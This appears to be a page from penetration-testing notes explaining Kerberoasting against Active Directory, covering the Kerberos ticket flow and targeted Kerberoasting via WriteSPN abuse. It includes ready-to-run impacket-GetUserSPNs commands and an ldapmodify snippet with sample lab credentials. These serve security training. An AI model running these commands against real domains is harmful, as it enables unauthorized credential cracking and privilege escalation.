Kerberoasting

Overview

The attacker uses a known username and password of a user on a domain.

A typical Kerberos workflow is:

Once a user logs into a domain-joined system, they get a TGT (ticket-granting ticket).
Then, they'll use that TGT to request a TGS (ticket-granting service) ticket any time they need to authenticate to a service.
The TGS is then passed to an application server on the network for authentication.

Any domain user can request a TGS. This is because:

The domain controller does not determine if a user can access a network service.
It simply provides a ticket to forward to a service and expects the service to determine permissions.

The important part here is:

A TGS contains a service principal's password hash.
Service principals are service accounts that run daemons on a server.

Kerberoasting works by requesting TGS, but:

The attacker does not forward the TGS to the server.
Rather, the attacker collects the Kerberos TGS hash and attempts to crack it to reveal a service principal's cleartext password.

What's the Flaw?

In many domains, service principals -- or user accounts configured with ServicePrincipalName (SPN) -- are incorrectly configured with excessive permissions or ACLs. If an attacker is able to crack a service principal's password hash and reveal the service principal's password, it can be passed around to own other hosts.

This could mean elevation of privilege by way of the service account or abusing DACLs to pivot to another resource and enumerate further.

The Attack

Existing Service Principals

This attack will send ticket-granting service ticket requests to the domain controller and expose the Kerberos hashes of domain service accounts.

The Kali Linux developers have created a series of wrappers around Impacket scripts. In this case, you can easily invoke GetUserSPNs.py by running impacket-GetUserSPNs

GetUserSPNs.py 'domain.tld/username:password' -dc-ip <domain-controller-ip> -request

impacket-GetUserSPNs 'domain.tld/username:password' -dc-ip <domain-controller-ip> -request

impacket-GetUserSPNs wrapper on Kali Linux

Targeted Kerberoasting

If you've compromised a user account and find that this user has WriteSPN on another user object, you can:

Set a ServicePrincipalName on the user object
Request a TGS for this SPN
Attempt to crack the hash in the TGS and reveal the target account's password

Abuse WriteSPN from Linux

ldapmodify -x -D 'john.doe@ad.lab' -w 'P@$$word123!' -H ldap://dc01.ad.lab << EOF
dn: CN=jane.doe,OU=Users,DC=ad,DC=lab
changetype: modify
add: servicePrincipalName
servicePrincipalName: pwn/pwn             
EOF

Use john.doe@ad.lab credential to set a SPN of pwn/pwn on jane.doe@ad.lab

impacket-GetUserSPNs 'ad.lab/john.doe:P@$$word123!' -dc-ip 10.80.80.2 -request-user 'jane.doe'

Output the TGS for jane.doe in crackable format

IPv6 DNS Spoofing

LLMNR Poisoning

Enumerating Hosts and Identifying the Domain Controllers

Passback Attacks

SMB Relay

NULL Session Enumeration

Kerberos Pre-Auth Username Enumeration

AS-REP Roasting

NTLM Credential Stuffing

PrintNightmare

Using Faketime for Ad-Hoc Kerberos Authentication

Kerberos Authentication from Kali

LdapDomainDump

Remote Bloodhound

BloodHound

LdapSearch

Dumping DNS Records with adidnsdump

Enum4Linux

NetExec

GetADUsers.py

GetUserSPNs.py

PowerShell AD Module on Any Domain Host as Any User

PowerView

Manual Enumeration

Extracting Secrets from PCAPs

Linux Remote Desktop Client

Pass the Hash

Pass the Password

Pass the Key

Pass the Certificate

Pass the Ticket

Password & Credential Brute Force

Spawn Processes as Other Users

Kerberoasting

Dumping Passwords from Windows Credential Manager

Dumping Hashes without Mimikatz

LdapModify

Mimikatz

Group Policy Preferences (GPP)

Impacket-Addcomputer

DCSync

Token Impersonation

Evil-WinRM Alternatives

PrintNightmare

ZeroLogon

Kerberoasting

Overview

What's the Flaw?

The Attack

Existing Service Principals

Targeted Kerberoasting

Abuse WriteSPN from Linux